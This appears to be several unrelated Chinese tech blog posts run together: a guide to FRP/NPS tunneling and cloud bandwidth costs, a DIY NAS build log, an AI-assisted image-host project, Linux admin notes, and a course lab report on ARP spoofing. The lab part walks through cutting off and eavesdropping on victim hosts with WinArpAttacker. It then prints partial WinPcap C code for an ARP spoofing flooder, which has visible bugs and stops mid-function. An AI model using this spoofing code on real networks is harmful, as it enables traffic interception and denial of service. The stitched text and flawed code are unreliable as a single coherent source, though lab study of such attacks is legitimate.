前言

笔者最近搭建了一套 NAS 系统，见 NAS 装机始末。通常在校园网内网环境（10.x.x.x）中使用，但部分场景（异地离线下载、远程访问媒体库）需从公网访问 NAS 。但是校园内网经过多层 NAT（网络地址转换），导致无法获取 NAS 固定公网 IP，所以需要采用中继或 P2P 打洞来实现公网访问。

P2P 打洞：一种让两个处于 NAT 后面的设备直接通信的技术，通过中间服务器协助建立直连。但在国内网络环境下，因 QOS（服务质量）、防火墙限制，稳定性较差。

本指南主要使用中继方式：通过一台公网 IP 服务器作为中间节点，连接内网 NAS 与公网设备的方式。

目前常见的内网穿透方案有以下几种：

• SaaS（软件即服务）方案：花生壳、节点小宝、飞牛云 FN Connect 等。开箱即用，下载安装即可实现内网穿透、异地组网。优点：门槛低、易部署。缺点：价格高、带宽受限、存在审计风险。适合小带宽场景（远程控制、SSH 等）。
• PaaS 方案：购买 FRP / NPS 服务（如闲鱼/淘宝），按峰值带宽/流量/端口数计费。优点：性价比高。缺点：共享带宽不稳定、存在审计风险、需要自行配置端口映射。
• 自建方案：自行购买服务器（轻量服务器或 ECS），部署内网穿透服务。优点：成本可控、稳定、无审计风险。缺点：需要一定技术能力和成本投入。

本文重点：工具介绍与使用、自建指南与成本。

一、内网穿透工具

本节介绍两种工具：FRP、NPS。

1.1 FRP

Github 地址：https://github.com/fatedier/frp

FRP 是用于内网穿透的反向代理应用，支持 TCP、UDP、HTTP、HTTPS，并支持 P2P。通过有公网 IP 的节点将内网服务暴露到公网，采用服务端-客户端架构：frps（服务端）和 frpc（客户端）。

反向代理：位于用户与目标服务器之间，接收请求并转发，将结果返回给用户。相对于正向代理，反向代理对客户端透明。

FRP 目前为 V1 且持续更新，支持 Windows、Linux、MacOS，常用协议均已覆盖。笔者常用场景为 TCP、HTTP 代理转发。

FRP 提供 Web UI，支持连接状态监控、流量统计、配置检查。安装可用 Github Release 或 Docker。

示例：笔者在 NAS（飞牛云）上部署客户端，可在应用商店下载并按配置填写。

1.2 NPS

Github 地址：https://github.com/djylb/nps

基本功能与 FRP 一致；原仓库已停止维护，现由社区二次维护。NPS 优势是后台管理完善，常见于闲鱼/淘宝内网穿透服务，支持用户、配额管理、可视化管理。

FRP 主要在客户端用 toml（配置文件格式）手动配置，上手成本较高。NPS 可将配置集中到服务端后台，支持可视化，对新手更友好。同样可用 Docker 或二进制部署。

# docker pull yisier1/nps# docker run -d --restart=always --name nps --net=host -v 你的conf目录:/conf -v /etc/localtime:/etc/localtime:ro yisier1/nps

选择建议：

• NPS：可视化、多租户、上手简单
• FRP：长期维护、插件丰富、可靠性高

二、自建内网穿透服务

2.1 场景分析

笔者使用场景：远程访问文档与媒体，高码率视频峰值需约 32Mbps，偶发使用（如地铁通勤时）。目标：

• 短时大带宽：速率稳定、延迟不敏感，用于文件传输、高码率播放。需要大带宽公网服务器。
• 长时小带宽：稳定（避免断连），用于远程运维；可用 FN Connect、花生壳等免费服务，也适合轻度办公。

2.2 服务器选择

此部分面向无服务器场景；若有 ECS（弹性计算服务）/ 轻量服务器的可跳过；如有带宽瓶颈，可加配按量网卡。

主要云厂商：阿里云、腾讯云、火山云。服务器计费：

• 包月计费：预付费，单价更低。
• 按量计费：后付费，按需起停。
• 抢占式实例：后付费，市场价格浮动，比按量计费节省最高约 90%。

抢占式实例：云厂商以折扣价出售闲置算力，可能因资源需求被回收，适合可容忍中断的非关键任务。

对于非工作时间、短时娱乐场景，建议使用抢占式实例以控制带宽外的成本，并可随时释放。可结合自定义镜像一键拉起内网穿透环境。

硬件配置：

• CPU & 内存：一般 2C / 4G 的 ECS / 轻量服务器即可流畅运行内网穿透。

• 带宽：参考 阿里云带宽计费方式。

  • 按使用流量：按出网流量 0.8 元/G 计费，适合波动、突发场景（推荐）
  • 按固定带宽：按带宽值与时长计费，可选 1–200 Mbps，适合流量稳定场景；公式：公网带宽费用 = 单位时长带宽值费用 × 使用时长；阿里云 3.36 元/Mbps/天

流量计费差异：不同厂商计费方式不同。阿里云仅计算出方向流量，火山云以出入方向流量较大值计费。详见 阿里云公网带宽计费、火山云公网带宽计费

实际案例：用 Infuse / FN Media 播放《权利的游戏》蓝光杜比，单文件约 10G，按流量约 8 元/集，成本偏高。改用网页端，启用服务端转码（4K 32Mbps → 1080p 10Mbps），传输量约 3G，单集约 2.5 元。成本仍偏高，但适用于对画质有要求或小流量办公场景。

2.3 成本分析

总成本构成：

• 服务器费用：0.06 元/H（阿里云抢占式实例 2C / 4G）
• 公网 IP：0.02 元/H（阿里云公网 IP 配置费用）
• 按量带宽：0.8 元/G（阿里云、火山云、腾讯云官网目录价格）

以一天 300G 为例，成本为 1.92 元 + 流量费。适合短时高带宽。已有服务器的可加配按量网卡，节省服务器费用。

三、总结

本文介绍内网穿透工具的选型与自建指南：

• 工具选型：FRP（稳定、插件丰富）、NPS（可视化、易用）
• 自建方案：服务器选择、硬件配置、计费模式
• 成本优化：按量计费，300G/天约 1.92 元基础费用

适合 NAS 用户或需要内网服务公网访问的小伙伴。

SEO 关键字：内网穿透, FRP, NPS, 反向代理, 服务器部署, 云服务器, 带宽计费, NAS 公网访问

都说电子界喜欢折腾的发烧友都必须经过下面几个步骤：装机 -> 小主机 -> 软路由 -> NAS -> 树莓派 。笔者一直对家庭影视中心 & 存储中心趋之若鹜，加之面对工作电脑频繁爆红的磁盘图标手足无措，后面尝试国内各大网盘后深痛恶绝，所以想趁着还心有余力 DIY 一台属于自己的 NAS。这里想简单分享一下整个装机之旅 ~

一、NAS 初识

1.1 何为 NAS

NAS (Network Attached Storage)：网络附加存储，是一种专门用于数据存储的计算机设备，通过网络为其他设备提供文件存储服务。

在非私人存储场景下，我们普通用户通常会选择商业存储 / 云存储服务，例如 OneDrive、Google Drive、国内各大网盘等；它们以一种类似 SaaS 模式来为用户提供服务，用户只需要安装对应的软件，用户数据则全部保存在厂商的数据中心中，这种模式通常会带来一些问题：

• 使用体验：通常只满足最低使用需求，存在限速严重等情况，例如百度网盘感人的 100 KB/s ;
• 产品价格：云存储服务或者对象存储价格高昂，长期使用成本高，且随着商业模式的转变有涨价的风险 ; 一般计费与存储量是正相关；
• 数据安全：数据隐私安全无法保障，存放在网盘或者其他服务存在审计风险 ;
• 使用场景：大多数只是提供软件开箱即用，但是对于一些用户独特的使用场景在短期甚至未来都无法满足，例如 WebDAV、iSCSI 等 ；

1.3 WHY DIY NAS

上面我们已经说到，玩 NAS 有两条路子： 成品 NAS or DIY NAS， 这就好比直接买笔记本电脑或者自己装主机一样。两者各有各的好处，而笔者选择 DIY 方案而非成品NAS，主要考虑有下面几点（主要还是穷~）：

• 性价比：想将预算控制在1500元以内（NAS 圈内一般是指刨去 HDD 的其他硬件成本），如果捡垃圾运气好，甚至可以用不到成品一半的价格买到同样的性能 >…<，
• 可玩性 & 扩展性：DIY 通常可玩性比较高，例如内存可以开到 32GB / 64GB，主板可扩展 PCIE 有很多玩法，以及支持多网口等，这些都很有吸引力；简直就是一个 Magic Box ！而且，谁不想 ALL IN ONE 呢 ！
• 环保主义：身为捡垃圾界的 Apple 玩家，想高效利用起来之前的一些闲置硬件，为世界减碳；例如闲置笔记本拆下来的 SSD / 无线网卡，以及老主机上的旧风扇 & 散热 / 线材杂七杂八的，拿来即用；简直是垃圾佬狂欢。
• 系统：好的硬件必须搭配好的软件系统，目前市面上有很多可选系统，例如黑群晖、飞牛等等；且都体验了一把，觉得成熟度都很高，基本满足我的需求。因此不需要去额外考虑闭源系统如极空间、绿联；

总的来说，我的优先级前三位分别是 性价比、稳定性、可玩性；下面我也会讲到在硬件选择上的考虑。

2.1 成品NAS对比分析

笔者也调研对比了市面上的 NAS 主流品牌，也简单看了下大家对各个品牌的点评，简单聊下各家的特点：

• 群晖：系统成熟稳定，生态丰富，但价格偏高
• 威联通：性价比不错，功能全面，适合进阶用户
• 极空间：国产新秀，界面友好，价格实惠
• 绿联：入门级选择，功能相对简单

其实围绕着成品 NAS 主要考虑其处理器、HDD / SDD 槽位、内存、接口类型这几个方面来进行选择。这里以极空间品牌 DXP 产品线的几款产品为例：

三、开发流程

3.1 硬件配置

其实 NAS 硬件配置与游戏主机的配置相差不大，可能就是在一些小的方面上不太一致

1. 处理性能：游戏主机着重处理性能，而 NAS 重在存储性能，因此可能在 CPU 的选择上有些区别。
2. 扩展性：游戏主机可能注重一些日常使用场景，例如基本的音/视频接口、单电口还有 USB 等常用接口。而 NAS 更注重存储，因此可能一些 IO 接口比较重要，例如网络接口（包括电口和光口）以及主板上的 SATA / M.2 接口，还有一些 RAID 阵列等。这里主要说的是主板上的区别。
3. 功耗上，这一点也是比较容易忽视的地方，和游戏主机即开即用不同，NAS 通常需要 7*24 H 开机的，所以所带来的电费是一比不小的开销，有时候甚至一两年能节约出来一两块机械硬盘的费用。同时为了 NAS 的稳定性和数据安全性，还有还要增设预防断电的 UPS 设备。

3.1.1 主体配置

总共花费1300+ ，价格上要比同配置的成品 NAS 性价比高多了。

3.1.2 主板详细配置

工控板：工业控制主板，专为工业环境设计，具有稳定性高、接口丰富、功耗低等特点。

主板市面上 搭载 N150 可选的包括 倍控和 畅网 ，按需选择即可。也可以选择其他 U 的妖板，例如 N100、N97 等。

这里选用倍控 N150 ITX 主板，主板规格见 N150 产品手册。主要规格如下：

• 支持 DDR5 SO-DIMM 内存,最大支持 16GB；
• 支持 DP、HDMI 双显示输出；
• 支持 4 个 2.5G 以太网；
• 支持 2 个 NVMe 2280 SSD 和 6 个 SATA 用于存储；
• 支持 2 个 USB3.0 接口和 2 个 USB2.0 接口；
• 支持 1 个 PCIe x1 插槽；

N150 处理器特点：

• 4核心4线程，基础频率1.5GHz，睿频可达3.4GHz
• 集成Intel UHD Graphics 730核显
• 支持DDR4/DDR5内存，最大16GB

软件配置

系统选择

除了硬件，另外最重要的是 NAS 系统，一个好的系统才能将硬件性能发挥最大化。这里在 B 友看到了目前几家比较流行的 NAS 系统体验地址，都一一体验了一把。最终还是觉得飞牛更适合我的品味。

各家系统体验地址：

• 极空间体验地址：https://tiyan.zspace.cn/
• 绿联体验地址：https://www.ugnas.com/experience/#/pc-pro-exp
• 威联通体验地址（维护中）：https://www.qnap.com.cn/zh-cn/live-demo/
• 飞牛体验地址：https://www.nas50.cn/?id=27
• 群晖体验地址：https://demo.synology.cn/zh-cn
• 黑威联通：https://imnks.com/5236.html

3.2.2 系统安装流程

1. 制作启动盘

   • 下载飞牛系统 ISO 镜像
   • 推荐使用 Ventoy 制作启动 U 盘（避免刻录，单 U 盘可以存放多个 ISO），当然也可以选择将 ISO 刻录到 U 盘上；

2. 系统安装

   • 选择系统盘（建议SSD）
   • 配置网络和时区
   • 设置管理员账户

3. 系统配置

   • 访问系统安装过程中配置的局域网 IP， 进行系统基本配置

存储配置

总共两个存储空间

• 存储空间1，系统盘 512G 切分出来的一部分
• 存储空间2，4*4T HDD + 16G SSD 分别作为实际存储盘，缓存加速盘；

SSD 加速：飞牛 OS 可以配置 SSD 盘作为 HDD 缓存加速盘，模式分别是 只读缓存 / 读写缓存；

网络配置

https://excalidraw.com/#json=Mw1ZW9pVSS8CY51PS19rx,OPyI78E_ugz6BWzANSrANg

FRP 内网穿透

FRP (Fast Reverse Proxy)：一个高性能的反向代理应用，支持内网穿透，可用于外网访问内网服务。详细介绍可参考维基百科。

服务端安装（云服务器）：

services:    frps:        container_name: ${CONTAINER_NAME}        deploy:            resources:                limits:                    cpus: ${CPUS}                    memory: ${MEMORY_LIMIT}        image: snowdreamtech/frps:0.63.0        labels:            createdBy: Apps        network_mode: host        restart: always        volumes:            - ./data/frps.toml:/etc/frp/frps.toml            - ./data/ssl:/etc/frp/ssl

服务端配置文件 (frps.toml)：

bindAddr = "0.0.0.0"bindPort = 7000auth.method = "token"auth.token = "xxxxx"webServer.addr = "0.0.0.0"webServer.port = 7500webServer.user = "xxxx"webServer.password = "xxxx"# tls#transport.tls.force = true#transport.tls.certFile = "/etc/frp/ssl/server.crt"#transport.tls.keyFile = "/etc/frp/ssl/server.key"#transport.tls.trustedCaFile = "/etc/frp/ssl/ca.crt"

客户端安装（NAS）：

serverAddr = "xxxx" # 你的公网IPserverPort = 7000#不能删除, 否则连接不上会闪退loginFailExit=falseauth.method = "token" # 具体可看客户端配置auth.token = "xxx" # 你的 Auth token[[proxies]]name = "test-tcp"type = "tcp"localIP = "127.0.0.1"localPort = 22remotePort = 6000

常用端口配置：

• 80/443：Web服务
• 22：SSH远程管理
• 3389：RDP远程桌面
• 5000：Docker管理界面

3.3 性能测试与优化

六、成品验收

6.1 系统演示

6.2 性能测试结果

实际使用测试： 3HDD 组 RAID 5 模式，单盘 80MB/s 左右，共有 3 块盘，其中 2 块 写数据，另一块写 校验，因此理论顺序写速度为 160MB/s ，和观察到基本一致。

fio 工具性能测试：

主要测试了无缓、带缓、M10 单独 的测试过程，应该比较全面了，带缓存测试结果如下：

• 1M 顺序读：IOPS=461, BW=461MiB/s
• 1M 顺序写： IOPS=364, BW=364MiB/s
• 4K 随机读：IOPS=96.5k, BW=377MiB/s
• 4K 随机写： IOPS=512, BW=2050KiB/s

因为只开了只读缓存，因此在缓存命中率较高的时候，对读性能（特别是 4K 随机读）提升尤其明显；但是 4K 随机写看起来还是很拉~

详细测试过程： https://larkcommunity.feishu.cn/wiki/PETnwskRaiNzEDkKGrGcwMWLnMe

6.4 网络测试

• 公网访问（内网穿透方式） 瓶颈在代理服务器公网带宽

• 公网访问（校园VPN） 瓶颈在校园网 VPN 接入点带宽

• 内网访问（交换机） 校园网交换机 & 测速客户端 & 测速服务端 支持 2.5gbps 电口。跑满理论速度 2.5gpbs

• 内网访问（校园网 AP） 未跑满 2.5gbps, 瓶颈应该在无线网卡。

功耗

• 4*HDD + 2*SSD 下，整机待机功耗 62W 左右。

参考资料

• 飞牛NAS官方文档
• Docker官方文档
• FRP项目地址
• Rclone官方文档
• Jellyfin官方文档

本文记录了从硬件选购到系统配置的完整过程，希望能为想要DIY NAS的朋友提供一些参考。如有问题欢迎交流讨论！

SEO关键字

NAS配置,DIY NAS,网络存储,家庭服务器,RAID阵列,Docker部署,内网穿透,FRP配置,云盘挂载,硬件选购,系统优化,性能测试,故障排除,技术博客

以下内容 纯手工 制作，辅助 AI 润色，保证无幻觉。
Vibe Coding： 可以理解为一种基于情感和氛围驱动的编程方式，没有传统编程的严谨缜密，而是和 AI 聊天的轻松活泼~

项目背景

事情还得从 2023 年说起，正在上大学的我写博客的时候经常遇到 Markdown 格式博客复制的时候，还有一大堆图片与 .md 捆绑打包在一起，传输和分享非常不便。当时想自己构建一个在线图床，可以快速上传博客图片，并获取全球都可以访问的链接。说干就干，先建立了一个叫做 TanYongF/iimage 的仓库，然后到设计方案的时候，后端具体逻辑设计了一版，但是怎么也绕不开前端（因为我不会啊！），随后时间一长就忘记这茬了。

但是最近看到越来越多的 AI 工具涌现出来，恰逢看到这个只有一个 README.md 仓库时候，突发奇想，是时候圆梦了，前端不会 AI 来凑！于是开启了这样一段 Vibe Coding 旅途，圆结了大学时期的梦想。

项目目标

• 快速上传：支持拖拽上传，一键获取链接
• 多格式支持：JPG、PNG、GIF、WebP 等主流格式
• MCP 协议：支持 Model Context Protocol，与 AI 工具无缝集成
• 自动化部署：GitHub Actions + Docker 实现持续集成

项目成果

• 开发周期：每天下班 2h，历时 5d，共计 10h+ 左右
• 技术栈：React + Node.js + Docker + GitHub Actions
• 核心功能：图床应用 & 对应的 MCP 客户端
• 在线演示：iimage

1. 工具调研

AI Coding 工具

AI Coding 工具在这个项目中承接着核心地位，简单来讲就是自然语言到高级编程语言的转换，作为中枢负责将其他各个模块生成的AI结果继承其他，主力工具。目前常见的 AI Coding 工具包括 Cursor、Trae 以及 Copilot 等，笔者也对这几种工具都体验过，国内版的基座模型包括 豆包、DeepSeek R2 以及 Gemini ，相较于支持 Claude Sonnet 的 Copilot 和 Cursor 也逊色不少。

选择理由：Cursor 支持多种模型，免费额度充足，代码生成质量高，项目级索引功能强大，是本次项目的核心工具。

AI 生图工具

为了丰富网站视觉效果，我调研了多种 AI 生图工具：

商业级工具

国内工具

开源工具

AI 建站工具

选择 Lovable 的理由：

• 纯自然语言输入：无需编程基础，直接描述需求
• 实时预览：所见即所得，快速验证想法
• 可 Fork 代码：支持二次开发，灵活性高
• 市场验证：15人团队3个月ARR达1700万美元

2. 开发流程

需求与技术文档生成

首先简单罗列出想要的技术栈，其中包括：

工程方面：- 前端：React + TypeScript + Ant Design- 后端：Node.js + Express- 部署：Docker + GitHub Actions + 火山云服务器业务方面：- 图片上传与存储- 链接生成与管理- 用户权限控制- MCP 协议支持

使用 Cursor 完善技术文档，并设计好具体的开发步骤以及后期规划，以 README 进行输出，后续开发工作都将以这个为范本来进行 Code：

快速生成网站前端

这里我使用到了 Lovable 来快速构建网站原型，特点：纯自然语言 → 实时预览 → 可 fork 代码。毕竟 15 人团队用 Lovable 3 个月把 ARR 做到 1700 万美元，经受住了市场考研。具体步骤：

1. 登录 Lovable 网站，创建一个新的项目
2. 输入需求描述：将上一步骤 Cursor 生成的关于前端的具体需求输入
3. 自动生成目录：系统会自动生成项目目录结构
4. 导出代码：生成完成后将前端项目导入到我们的仓库代码中

AI Coding 开始集成

根据需求文档开始：

1. 项目初始化：让 Cursor 构建起代码目录，包括前后端目录、React初始化、开发环境配置等。
2. 渐进式开发：在相应的功能点依照 README.md 来进行 Coding，在生成的时候，不要一股脑的 Accept，而是生成一次跑一次，没问题再进行下次 Agent 调用。并且可以不定时让 Cursor 检查当前代码结构是否清晰，是否需要重构。
3. 自动化部署：编写 CICD 流水线，由于我是想接入 Github Actions 来进行代码从编译、打包并发布 Docker 镜像、登录云服务器自动拉包并部署 这一整套流程，可以让 Cursor 很流畅的完成。并且体验非常不错，减少了很多部署的时间，将心思全部放在开发上。
4. 持续迭代：后面就是上线后的一些功能迭代和优化了，本质上都是从步骤 1-3 的循环。

Cursor 使用技巧

在使用 Cursor 的时候，自己有一些个人见解：

1. 构建项目级索引：记得使用 Cursor 的索引工具构建项目级索引，会自动扫描所有文件，然后按语义切成 Chunk，然后 Embedding 成向量存入本地向量库，可以支持秒级生成。
2. 提供详细上下文：尽量让 Cursor 理解更多的 Context，而不是全局代码
3. 分步骤生成：避免一次性接受大量代码，确保质量

3. 项目展示

体验地址： https://paste.tans.fun/

MCP 协议支持

网站首页展示了详细的 MCP 配置方法：

图床上传功能

核心的图片上传和管理功能：

4. 技术架构与部署

系统架构

前端 (React) → 后端 (Node.js) → 数据库 (Mysql + OSS)    ↓              ↓                ↓   CDN 加速    Docker 容器     云存储服务（图片管理/图片存储）

性能优化

• CDN 加速：利用阿里云OSS提供的边缘加速能力，大大提升图片访问速度
• 图片去重：通过 Base64 去重，防止冗余图片
• 数据库优化：建立索引，提升查询性能，并有效存储图片信息

5. 总结与思考

技术趋势洞察

AI 这波风潮真的让我感受到了**“Not Control， Only Context”** 的口号，无论是前端开发人员，或者是后端开发人员，仿佛现在摇身一变成了产品经理，不再受技术栈的限制，技术彻底无价，而产品理解和产品思考变得越来越有价。

编程语言时代演进：

• 1940s：机器语言时代
• 1950s：高级语言时代
• 1980s：面向对象时代
• 2000s：Web 与移动时代
• 2015s：云原生时代
• 2020s：自然语言编程时代

个人思考

同时，这次 Vibe 编程初体验带给我的不仅仅是 AI 的技术革新力，更是对自己定位的思考，如果我们只是通过自然语言构建了这样一套系统，是否还会有那种当初的成就感呢？

我的答案：会的！因为：

• 技术门槛降低，但产品思维要求更高
• 从"写代码"转向"设计产品"
• 从"解决技术问题"转向"解决业务问题"
• 从"代码工匠"转向"产品艺术家"

6. 参考资料

工具文档

• Cursor 自定义 Prompt
• Cursor Codebase Indexing
• Cursor 官方文档

项目资源

• GitHub 仓库：iimage
• 在线演示：https://paste.tans.fun/
• MCP 协议：Model Context Protocol

学习资源

• AI 辅助编程最佳实践
• Vibe Coding 社区
• 自然语言编程指南

欢迎交流：如果您对 AI 辅助编程或 Vibe Coding 感兴趣，欢迎在评论区分享您的想法和经验！

持续更新：本文会随着 AI 工具的发展持续更新，敬请关注。

磁盘操作

要查看磁盘情况和分区，我们可以使用以下命令：

lsblk

系统安装

简单的镜像烧录等操作不在此进行阐述。对于高级操作，可以使用工具如Ventory来制作安装U盘。一旦进入安装界面，最重要的一步就是分区操作。可以参考这篇博客 Linux分区[https://zhuanlan.zhihu.com/p/408467806] 来了解详细的分区过程。简单来说，我们需要将磁盘划分为以下几个区域：

以上是手动分区的过程。对于 /home 分区，通常用来保存各个用户数据，可以将剩余的容量全部分配给它。对于初次安装，建议按照推荐的分区进行操作。但如果有特殊需求，可以尝试按照上方的表格进行手动分区。

网络操作

Ubuntu配网

要通过命令行修改网卡配置，我们可以使用nmcli命令行工具。以下是一般的步骤：

1. 打开终端：按下Ctrl + Alt + T组合键打开终端。

2. 查看可用的网络连接：运行以下命令列出可用的网络连接及其名称：

   nmcli connection show

   找到我们想要修改配置的网络连接的名称。

3. 打开网络连接配置文件：运行以下命令编辑网络连接的配置文件：

   sudo nmcli connection edit <连接名称>

   将<连接名称>替换为我们要编辑的网络连接的名称。

4. 修改网卡配置：在编辑模式下，我们可以使用不同的命令来修改不同的配置。以下是一些常用的命令示例：

   • 修改IP地址和子网掩码：

     set ipv4.addresses <IP地址/子网掩码>

   • 修改默认网关：

     set ipv4.gateway <默认网关IP地址>

   • 修改DNS服务器：

     set ipv4.dns <DNS服务器IP地址>

   • 修改连接名称：

     set connection.id <新连接名称>

   • 保存修改：

     save

   • 退出编辑模式：

     quit

5. 应用配置更改：运行以下命令使配置更改生效：

   sudo nmcli connection up <连接名称>

   将<连接名称>替换为我们修改后的网络连接的名称。

CentOS配网

ifconfig #查看网卡名称vi /etc/sysconfig/network-scripts/ifcfg-<网卡名称> # 修改网卡配置

配置示例如下（根据需求进行配置，一般只需要配置IP/子网掩码、DNS、网关几个参数）：

TYPE=EthernetPROXY_METHOD=noneBROWSER_ONLY=noBOOTPROTO=staticDEFROUTE=yesIPV4_FAILURE_FATAL=noIPV6INIT=yesIPV6_AUTOCONF=yesIPV6_DEFROUTE=yesIPV6_FAILURE_FATAL=noIPV6_ADDR_GEN_MODE=stable-privacyNAME=ens5f0UUID=68c8080c-821d-4e82-80f7-7b4513ff8582DEVICE=ens5f0ONBOOT=yesIPADDR=10.161.34.8NETMASK=255.255.255.0GATEWAY=10.161.34.1DNS1=10.3.9.4DNS2=10.3.9.5DNS3=10.3.9.6

查看网卡编号

如果我们想获取服务器上多个网口/光口对应的MAC地址，使用ifconfig命令只会输出所有网卡的编号，而无法知道每个口对应的MAC地址。这时我们可以使用以下命令：

sudo ethtool -p <网卡编号>

运行该命令后，终端会阻塞，对应的网口指示灯将会闪烁（即使没有插入网线）。按Ctrl + C退出后，该口将停止闪烁，此时我们就知道了该物理网络在系统中的编号，通常网口的编号为 ens5f0 或者 enp5f1 等。

其他

增加用户

useradd -d /home/<username> -s /bin/bash -m <username> # username修改成你想要的sudo visudo # 可选将该用户添加到sudoers#随后在root ALL = (ALL:ALL):ALL 下面添加一行 <username> ALL=(ALL:ALL):ALL #保存即可 

sudoers 文件中的规则采用以下格式：
<user> <host>=(<runas-user>:<runas-group>) <commands>

• <user>: 用户名或用户组名，表示适用于哪个用户或用户组。
• <host>: 主机名或主机别名，表示适用于哪个主机。
• <runas-user>: 可选项，表示可以以哪个用户身份运行命令。
• <runas-group>: 可选项，表示可以以哪个用户组身份运行命令。
• <commands>: 允许执行的命令。

RAID阵列

如果主机配有RAID阵列卡，在开机时，会提示按Ctrl + R进入磁盘阵列设置。在设置中，选择所有磁盘，然后选择相应的RAID 0或其他模式进行组合。

简述

ARP（Address Resolution Protocol）协议是一个通过解析网络层地址来寻找数据链路层地址的网络传输协定。其报文格式如下：

其中，每个字段的含义如下。

• 硬件类型：指明了发送方想知道的硬件接口类型，以太网的值为 1。
• 协议类型：表示要映射的协议地址类型。它的值为 0x0800，表示 IP 地址。
• 硬件地址长度和协议长度：分别指出硬件地址和协议的长度，以字节为单位。对于以太网上 IP 地址的ARP请求或应答来说，它们的值分别为 6 和 4。
• 操作类型：用来表示这个报文的类型，ARP 请求为 1，ARP 响应为 2，RARP 请求为 3，RARP 响应为 4。
• 发送方 MAC 地址：发送方设备的硬件地址。
• 发送方 IP 地址：发送方设备的 IP 地址。
• 目标 MAC 地址：接收方设备的硬件地址。
• 目标 IP 地址：接收方设备的IP地址。

实验一

运行 WinArpAttacker、Ettercap，扫描在线主机，对目标主机进行“禁止上网”、“IP 冲突”等攻击，查看目标主机状态，通过 WireShark 等抓包工具，捕获 ARP 欺骗攻击的数据包，分析 ARP 攻击的原理。

禁止上网攻击

1. 首先在受害者主机上，使用arp -a查看ARP缓存，并执行ping baidu.com来确认主机能否正常上网。观察到ARP表配置正确，且能ping通正常网站。

2. 运行WinArpAttacker软件，扫描在线主机后，选定指定主机进行禁止上网攻击。

3. 在受害者主机上执行arp -a命令查看ARP缓存表，发现网关对应的MAC配置成01-01-01-01-01-01，抓包内容显示攻击方分别向网关和受害者方发送ARP报文，请网关将受害者主机ip所对应的MAC修改为01-01-01-01-01-01,请求受害者主机将网关ip所对应的MAC修改为01-01-01-01-01-01.

4. 受害者再次执行ping baidu.com，观察攻击是否其效果。结果观察到baidu.com无法正常连接

网关监听实验

1. 运行WinArpAttacker软件，在在线主机列表中选取待攻击主机，执行监听网关通信攻击。在攻击方主机执行抓包程序，发现攻击方分别向受害方和网关发送一个ARP包

   • 向网关发送ARP包，将网关ARP表中的受害方MAC地址改成攻击方的MAC地址
   • 向受害方发送ARP包，将受害方ARP表中的网关MAC地址改成攻击方的MAC地址

   至此，攻击方分别欺骗了受害方和网关。

2. 在受害者方使用WinARPAttacker手动发送ARP包功能，模拟向网关发送ARP包

3. 在攻击方运行抓包程序，发现已经截获受害方与网关之间的通信

主机欺骗攻击

1. 攻击方运行WinARPAttacker软件，选择两个受害者主机作为监听对象。并执行监听主机通信攻击。

   

2. 在受害主机1运行arp -a观察其ARP表

   

3. 与此同时，受害主机1与受害者2发送报文时，在受害者1主机上执行抓包程序。发现发往受害者2的ICMP包虽然目的ip地址是受害者2主机ip，但是MAC地址已经被篡改成Attacker的MAC地址。

   

4. 在攻击方主机上执行抓包程序。捕获受害者之间的通信报文。发现两者之间的通信报文都会先经过受害者主机，这样一来就达到了监听效果。整个过程对于受害者主机来说是完全无感的。

   

   

ARP欺骗攻击编程实验

实验环境：

• 使用VMware软件起三个虚拟机，其中一台为攻击方，另外两台为受害者主机，三者连接同一虚拟网络中。三者的网络配置如下：

  主机	MAC	IP
  攻击方	00-0C-29-83-C9-7C	192.168.44.128
  受害方1	00-0C-29-24-48-55	192.168.44.129
  受害方2	00-0C-29-E2-30-A6	192.168.44.130

1. 使用Winpcap SDK，编写程序，对指定的目标IP地址进行ARP欺骗攻击

#include <stdlib.h>#include <stdio.h>#include <pcap.h>#include <winsock2.h>#pragma comment(lib,"ws2_32.lib")#pragma pack(2) #define MAC_LEN 6void buildPacket(u_char packet[]);int selectAdapter(pcap_if_t* targetAdapter);// 以太网帧头typedef struct _eth_header {unsigned char dst_mac[MAC_LEN];unsigned char src_mac[MAC_LEN];unsigned short type;} ETH_HEADER;// arp报文头typedef struct _arp_header {unsigned short hardware_type;unsigned short protocol_type;unsigned char hardware_len;unsigned char protocol_len;unsigned short option;unsigned char src_mac[MAC_LEN];unsigned long src_ip;unsigned char dst_mac[MAC_LEN];unsigned long dst_ip;} ARP_HEADER;;// arp报文typedef _declspec(align(2)) struct _arp_packet {ETH_HEADER eth_hdr;ARP_HEADER arp_hdr;} ARP_PKT;char errbuf[PCAP_ERRBUF_SIZE];u_char* packet1[100];//arp帧包1u_char* packet2[100];//arp帧包2int flood = 10;//发送次数void main(int argc, char **argv){pcap_t* fp;u_char packet[100];int i = 0;// Step1 : select and open adapterpcap_if_t targetAdapter;selectAdapter(&targetAdapter);if ((fp = pcap_open_live(targetAdapter.name,// name of the device65536,// portion of the packet to capture. It doesn't matter in this case 1,// promiscuous mode (nonzero means promiscuous)1000,// read timeouterrbuf// error buffer)) == NULL){fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", argv[1]);return 2;}// step2 : build ARP packetbuildPacket(packet);// step3 : send packetprintf("please input the flood(num of packet to send):");scanf_s("%d", &flood);for (int i = 0; i < flood; i++){if (pcap_sendpacket(fp,// Adapterpacket1,// buffer with the packet42// size) != 0){fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));return 3;}if (pcap_sendpacket(fp,// Adapterpacket2,// buffer with the packet42// size) != 0){fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));return 3;}Sleep(500);//发送间隔时间100ms}pcap_close(fp);return;}void pktbuild2(ARP_PKT* pkt, int *smac, char *sip, int *dmac, char *dip) {for (int i = 0; i < MAC_LEN; i++) pkt->arp_hdr.src_mac[i] = smac[i], pkt->eth_hdr.src_mac[i] = smac[i]; pkt->arp_hdr.hardware_type = htons(0x1);pkt->arp_hdr.protocol_type = htons(0x800);pkt->arp_hdr.hardware_len = 6;pkt->arp_hdr.protocol_len = 4;pkt->arp_hdr.option = htons(0x2);for (int i = 0; i < MAC_LEN; i++) pkt->arp_hdr.dst_mac[i] = dmac[i], pkt->eth_hdr.dst_mac[i] = dmac[i];pkt->arp_hdr.dst_ip = inet_addr(dip);pkt->arp_hdr.src_ip = inet_addr(sip);pkt->eth_hdr.type = htons(0x0806);}/*用户输入mac地址 */void buildPacket(u_char packet[]) {int self_mac[6];//攻击者自己的mac地址//int victim1_ip[4];//受害者1的ipchar victim1_ip[15];int victim1_mac[6];//受害者1的mac地址//int victim2_ip[4];//受害者2的ipchar victim2_ip[15];int victim2_mac[6];//受害者2的mac地址/* Supposing to be on ethernet, set mac destination to 1:1:1:1:1:1 